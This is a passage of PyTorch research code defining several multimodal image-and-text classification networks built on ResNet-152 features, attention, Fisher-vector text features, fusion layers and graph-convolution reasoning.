x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.relu(self.fc1(self.fc1_bn(x)))
return x, attn_mask
class BaseNet(nn.Module):
def __init__(self, args, num_classes, embedding_size = 300, pretrained=True, attention=True):
super(BaseNet, self).__init__()
self.args = args
self.num_classes = num_classes
self.pretrained = pretrained
self.embedding_size = embedding_size
if self.args.fusion == 'block':
self.fusion = Block([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'blocktucker':
self.fusion = BlockTucker([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'tucker':
self.fusion = Tucker ([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mutan':
self.fusion = Mutan([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mlb':
self.fusion = MLB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfb':
self.fusion = MFB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfh':
self.fusion = MFH([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
# models.densenet169()
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
#print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
#print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
self.fc1 = nn.Linear(100352, 1024)
self.fc1_bn = nn.BatchNorm1d(1024)
# Semantic Attention Weights
self.fc_w = nn.Linear(1024, self.embedding_size, bias=False)
# LAST LAYERS
self.bn3 = nn.BatchNorm1d(1024 + self.embedding_size)
self.fc3 = nn.Linear(1024 + self.embedding_size, num_classes)
'''
self.fc3 = nn.Linear(1024 + self.embedding_size, 300)
# CLASSIF LAYER
self.bn4 = nn.BatchNorm1d(300)
self.fc4 = nn.Linear(300, num_classes)
'''
def forward(self, im, textual_features, sample_size):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
visual_features = F.relu(self.fc1_bn(self.fc1(x))) # Visual Features BS x 1024
x = self.fc_w(visual_features) # BS x 300 or (embedding size)
x = torch.bmm(x.view(sample_size, 1, self.embedding_size), textual_features.permute(0, 2, 1))
x = torch.tanh(x)
x = F.softmax(x, dim=2)
# Attention over textual features
x = torch.bmm(x, textual_features)
# Reshape visual features before fusion
# Fuse
if self.args.fusion != 'concat':
x = self.fusion([x.view(sample_size, -1),visual_features])
else:
x = torch.cat((x[:, 0, :], visual_features), 1)
'''
ranking_vector = F.relu(self.fc3(self.bn3(x)))
x = F.dropout(self.fc4(self.bn4(ranking_vector)), p=0.3, training=self.training)
'''
x = F.dropout(self.fc3(self.bn3(x)), p=0.3, training=self.training)
return x, attn_mask
class FisherNet(nn.Module):
def __init__(self, args, num_classes, max_textual = 20, embedding_size = 38400, reduced_size = 512, pretrained=True, attention=True):
super(FisherNet, self).__init__()
self.args = args
self.num_classes = num_classes
self.pretrained = pretrained
self.embedding_size = embedding_size
self.reduced_size = reduced_size
self.max_textual = max_textual
if self.args.fusion == 'block':
self.fusion = Block([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'blocktucker':
self.fusion = BlockTucker([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'tucker':
self.fusion = Tucker ([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mutan':
self.fusion = Mutan([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mlb':
self.fusion = MLB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfb':
self.fusion = MFB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfh':
self.fusion = MFH([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
#print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
#print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# Reduce Dimensionality of Fisher Vectors
self.FV_bn1 = nn.BatchNorm1d(embedding_size)
self.FV_fc1 = nn.Linear(embedding_size, 4096)
self.FV_bn2 = nn.BatchNorm1d(4096)
self.FV_fc2 = nn.Linear(4096, reduced_size)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
self.fc1 = nn.Linear(100352, 1024)
self.fc1_bn = nn.BatchNorm1d(1024)
# Semantic Attention Weights
self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
# LAST LAYERS
self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)
def forward(self, im, textual_features, sample_size):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
visual_features = F.relu(self.fc1_bn(self.fc1(x))) # Visual Features BS x 1024
x = self.fc_w(visual_features) # BS x 300 or (embedding size)
textual_features = F.relu(self.FV_fc1(self.FV_bn1(textual_features.view(sample_size, -1))))
textual_features = F.dropout(F.relu(self.FV_fc2(self.FV_bn2(textual_features))), p=0.5, training=self.training)
x = torch.mul(x, textual_features)
x = torch.tanh(x)
x = torch.mul(x, textual_features)
# Reshape visual features before fusion
# Fuse
if self.args.fusion != 'concat':
x = self.fusion([x.view(sample_size, -1),visual_features])
else:
x = torch.cat((x, visual_features), 1)
x = F.dropout(self.fc3(self.bn3(x)), p=0.5, training=self.training)
return x, attn_mask
class Orig_FisherNet(nn.Module):
def __init__(self, args, num_classes, max_textual = 20, embedding_size = 38400, reduced_size = 512, pretrained=True, attention=True):
super(Orig_FisherNet, self).__init__()
self.args = args
self.num_classes = num_classes
self.pretrained = pretrained
self.embedding_size = embedding_size
self.reduced_size = reduced_size
self.max_textual = max_textual
if self.args.fusion == 'block':
self.fusion = Block([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'blocktucker':
self.fusion = BlockTucker([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'tucker':
self.fusion = Tucker ([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mutan':
self.fusion = Mutan([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mlb':
self.fusion = MLB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfb':
self.fusion = MFB([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfh':
self.fusion = MFH([reduced_size, 1024], 1024+reduced_size, mm_dim= self.args.mmdim)
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
#print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
#print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# Reduce Dimensionality of Fisher Vectors
self.FV_bn1 = nn.BatchNorm1d(embedding_size)
self.FV_fc1 = nn.Linear(embedding_size, 4096)
self.FV_bn2 = nn.BatchNorm1d(4096)
self.FV_fc2 = nn.Linear(4096, reduced_size)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
self.fc1 = nn.Linear(100352, 1024)
self.fc1_bn = nn.BatchNorm1d(1024)
# Semantic Attention Weights
self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
# LAST LAYERS
self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
visual_features = F.relu(self.fc1_bn(self.fc1(x))) # Visual Features BS x 1024
x = self.fc_w(visual_features) # BS x 300 or (embedding size)
# FISHER FEATURES
textual_features = F.relu(self.FV_fc1(self.FV_bn1(textual_features.view(sample_size, -1))))
#textual_features = F.dropout(F.relu(self.FV_fc2(self.FV_bn2(textual_features))), p=0.5, training=self.training)
textual_features = F.dropout(self.FV_fc2(self.FV_bn2(textual_features)), p=0.5, training=self.training)
x = torch.mul(x, textual_features)
x = torch.tanh(x)
x = torch.mul(x, textual_features)
# Reshape visual features before fusion
# Fuse
if self.args.fusion != 'concat':
x = self.fusion([x.view(sample_size, -1),visual_features])
else:
x = torch.cat((x, visual_features), 1)
x = F.dropout(self.fc3(self.bn3(x)), p=0.5, training=self.training)
return x, attn_mask, 0
class TextNet(nn.Module):
def __init__(self, args, num_classes, embedding_size = 300, reduced_size=512, pretrained=True, attention=True):
super(TextNet, self).__init__()
self.args = args
self.num_classes = num_classes
self.pretrained = pretrained
self.embedding_size = embedding_size
self.reduced_size = reduced_size
if self.args.fusion == 'block':
self.fusion = Block([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'blocktucker':
self.fusion = BlockTucker([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'tucker':
self.fusion = Tucker ([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mutan':
self.fusion = Mutan([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mlb':
self.fusion = MLB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfb':
self.fusion = MFB([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
elif self.args.fusion == 'mfh':
self.fusion = MFH([embedding_size, 1024], 1024+embedding_size, mm_dim= self.args.mmdim)
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
#print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
#print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
self.fc1 = nn.Linear(100352, 1024)
self.fc1_bn = nn.BatchNorm1d(1024)
# Semantic Attention Weights
self.fc_w = nn.Linear(1024, self.reduced_size, bias=False)
# LAST LAYERS
self.bn3 = nn.BatchNorm1d(1024 + self.reduced_size)
self.fc3 = nn.Linear(1024 + self.reduced_size, num_classes)
# ADDITIONAL LAYERS TO TEST SELF LEARNING OF MORPHOLOGY
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 550)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(550, self.reduced_size)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
visual_features = F.relu(self.fc1_bn(self.fc1(x))) # Visual Features BS x 1024
x = self.fc_w(visual_features) # BS x 300 or (embedding size)
# SELF LEARNING?
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features))
# USUAL PIPELINE
x = torch.bmm(x.view(sample_size, 1, self.reduced_size), textual_features.permute(0, 2, 1))
x = torch.tanh(x)
x = F.softmax(x, dim=2)
# Attention over textual features
x = torch.bmm(x, textual_features)
# Reshape visual features before fusion
# Fuse
if self.args.fusion != 'concat':
x = self.fusion([x.view(sample_size, -1),visual_features])
else:
x = torch.cat((x[:, 0, :], visual_features), 1)
'''
ranking_vector = F.relu(self.fc3(self.bn3(x)))
x = F.dropout(self.fc4(self.bn4(ranking_vector)), p=0.3, training=self.training)
'''
x = F.dropout(self.fc3(self.bn3(x)), p=0.3, training=self.training)
return x, attn_mask, 0
def normalize(x):
return x / x.norm(dim=1, keepdim=True)
def l2norm(X):
"""L2-normalize columns of X
"""
norm = torch.pow(X, 2).sum(dim=1, keepdim=True).sqrt()
X = torch.div(X, norm)
return X
class globalNet(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(globalNet, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
#
#
# for param in self.cnn_features.parameters():
# param.requires_grad = False
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(36)
self.fc2 = nn.Linear (2048,2048)
# FINAL LAYER
self.fc3_bn = nn.BatchNorm1d(2*2048)
self.fc3 = nn.Linear(2*2048, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
v = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
v = torch.mean(v, dim =1)
x = torch.cat((x, v), 1)
x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class baseGCN(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(baseGCN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear (2048,2048)
# FINAL LAYER
self.fc3_bn = nn.BatchNorm1d(2*2048)
self.fc3 = nn.Linear(2*2048, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
v = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# GCN reasoning
# -> B,D,N
GCN_img_emd = v.permute(0, 2, 1)
GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
GCN_img_emd = torch.mean(GCN_img_emd, dim =1)
x = torch.cat((x, GCN_img_emd), 1)
x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class textGCN(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(textGCN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 2048)
# Final Visual Features projection
self.fc_visual_bn = nn.BatchNorm1d(4096)
self.fc_visual = nn.Linear(4096, 2048)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 2048)
# FINAL LAYER
self.fc3_bn = nn.BatchNorm1d(2 * 2048)
self.fc3 = nn.Linear(2 * 2048, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# FC for LOCAL Features
GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# GCN reasoning
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
# Concatenate Global and Local visual feats
vf = torch.cat((x, GCN_img_emd), 1)
vf = F.leaky_relu(self.fc_visual(self.fc_visual_bn(vf)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 2048
# ATTENTION USUAL PIPELINE
x = torch.bmm(vf.view(sample_size, 1, 2048), textual_features.permute(0, 2, 1))
x = torch.tanh(x)
x = F.softmax(x, dim=2)
# Attention over textual features
x = torch.bmm(x, textual_features)
# Reshape visual features before fusion
# Fuse
if self.args.fusion != 'concat':
# x = self.fusion([x.view(sample_size, -1), visual_features])
print('Error FUSION Not implemented')
else:
x = torch.cat((x[:, 0, :], vf), 1)
x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class fullGCN(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(fullGCN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
# self.Rs_GCN_5 = Rs_GCN(in_channels=2048, inter_channels=2048)
# self.Rs_GCN_6 = Rs_GCN(in_channels=2048, inter_channels=2048)
# self.Rs_GCN_7 = Rs_GCN(in_channels=2048, inter_channels=2048)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 2048)
# TEXTUAL FEATURES N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 1024)
self.bn_text2 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text2 = nn.Linear(1024, 2048)
# FINAL LAYER
self.fc3_bn = nn.BatchNorm1d(2 * 2048)
self.fc3 = nn.Linear(2 * 2048, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# FC for LOCAL Features
GCN_img_emd = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE)
textual_features = self.bn_text1(textual_features)
textual_features = F.leaky_relu(self.fc_text1(textual_features))
textual_features = self.bn_text2(textual_features)
textual_features = F.leaky_relu(self.fc_text2(textual_features)) # SHAPE: N X MAX_TEXTUAL X 2048
# GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES
GCN_img_emd = torch.cat((GCN_img_emd, textual_features), dim=1)
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
# GCN_img_emd = self.Rs_GCN_5(GCN_img_emd)
# GCN_img_emd = self.Rs_GCN_6(GCN_img_emd)
# GCN_img_emd = self.Rs_GCN_7(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
# Concatenate Global and Local visual feats
x = torch.cat((x, GCN_img_emd), dim=1)
x = F.dropout(self.fc3(self.fc3_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class dualGCN(nn.Module):
# Projection of fasttext into FasterRCNN space (No initial FC)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(dualGCN, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
self.Rs_GCN_1 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_2 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_3 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_4 = Rs_GCN(in_channels=2048, inter_channels=2048)
self.Rs_GCN_5 = Rs_GCN(in_channels=300, inter_channels=300)
self.Rs_GCN_6 = Rs_GCN(in_channels=300, inter_channels=300)
self.Rs_GCN_7 = Rs_GCN(in_channels=300, inter_channels=300)
self.Rs_GCN_8 = Rs_GCN(in_channels=300, inter_channels=300)
# Attention model
self.attention = attention
self.attn = AttentionModel()
self.attn_bn = nn.BatchNorm2d(2048)
# OUTPUT OF CNN BS X 2048 X 7 X 7 = 100352
self.fc1_bn = nn.BatchNorm1d(2048 * 7 * 7)
self.fc1 = nn.Linear(2048 * 7 * 7, 2048)
# LOCAL FEATURES N X 36 X 2048
self.fc2_bn = nn.BatchNorm1d(self.args.max_visual)
self.fc2 = nn.Linear(2048, 300)
# TEXTUAL FEATURES TO N X 36 X 2048
self.bn_text1 = nn.BatchNorm1d(self.args.max_textual)
self.fc_text1 = nn.Linear(self.embedding_size, 2048)
# FC TO FIT SPACES
self.bn_output_gcn = nn.BatchNorm1d(300)
self.fc_output_gcn = nn.Linear(300, 2048)
# FINAL FUSION BEFORE CLASSIFICATION
self.final_bn = nn.BatchNorm1d(3*2048)
self.final_fc = nn.Linear(3*2048, num_classes)
def forward(self, im, textual_features, sample_size, local_features, text_bboxes, local_bboxes):
x = self.cnn_features(im) # Size (BS x 2048 x 7 x 7)
if self.attention:
x, attn_mask = self.attn(x) # Size (BS x 2048)
x = self.attn_bn(x)
x = x.view(x.size(0), -1)
x = F.leaky_relu(self.fc1(self.fc1_bn(x)))
# Textual Features SHAPE: N X MAX_TEXTUAL X 300 (DEFAULT EMB SIZE) TO 2048
textual_features_2048 = self.bn_text1(textual_features)
textual_features_2048 = F.leaky_relu(self.fc_text1(textual_features_2048))
# FC for LOCAL Features TO 300
local_features_300 = F.leaky_relu(self.fc2(self.fc2_bn(local_features)))
# GCN reasoning LOCAL VISUAL + TEXTUAL FEATURES_2048
GCN_img_emd = torch.cat((local_features, textual_features_2048), dim=1)
# -> B,D,N
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = self.Rs_GCN_1(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_2(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_3(GCN_img_emd)
GCN_img_emd = self.Rs_GCN_4(GCN_img_emd)
# -> B,N,D
GCN_img_emd = GCN_img_emd.permute(0, 2, 1)
GCN_img_emd = l2norm(GCN_img_emd)
GCN_img_emd = torch.mean(GCN_img_emd, dim=1)
# GCN reasoning TEXTUAL FEATURES + LOCAL VISUAL_300
GCN_text_emd = torch.cat((textual_features, local_features_300), dim=1)
# -> B,D,N
GCN_text_emd = GCN_text_emd.permute(0, 2, 1)
GCN_text_emd = self.Rs_GCN_5(GCN_text_emd)
GCN_text_emd = self.Rs_GCN_6(GCN_text_emd)
GCN_text_emd = self.Rs_GCN_7(GCN_text_emd)
GCN_text_emd = self.Rs_GCN_8(GCN_text_emd)
# -> B,N,D
GCN_text_emd = GCN_text_emd.permute(0, 2, 1)
GCN_text_emd = l2norm(GCN_text_emd)
GCN_text_emd = torch.mean(GCN_text_emd, dim=1)
# PROJECT FINAL FEATURES (OUTPUT FROM GCN) TO A SPACE DIM: 1 X 2048
GCN_text_emd = F.leaky_relu(self.fc_output_gcn(self.bn_output_gcn(GCN_text_emd)))
x = torch.cat((x, GCN_img_emd, GCN_text_emd), dim=1)
x = F.dropout(self.final_fc(self.final_bn(x)), p=0.3, training=self.training)
return x, attn_mask
class fullGCN_attn(nn.Module):
# Network that uses global (Resnet) and local (Faster RCNN VG features)
def __init__(self, args, num_classes, embedding_size, pretrained=True, attention=True):
super(fullGCN_attn, self).__init__()
self.args = args
self.embedding_size = embedding_size
self.num_classes = num_classes
self.pretrained = pretrained
resnet152 = models.resnet152(pretrained)
for name, child in resnet152.named_children():
if name not in ['layer4']:
# print(name + ' is frozen')
for param in child.parameters():
param.requires_grad = False
else:
# print(name + ' is not frozen')
for param in child.parameters():
param.requires_grad = True
self.cnn_features = nn.Sequential(*list(resnet152.children())[:-2])
# GCN reasoning
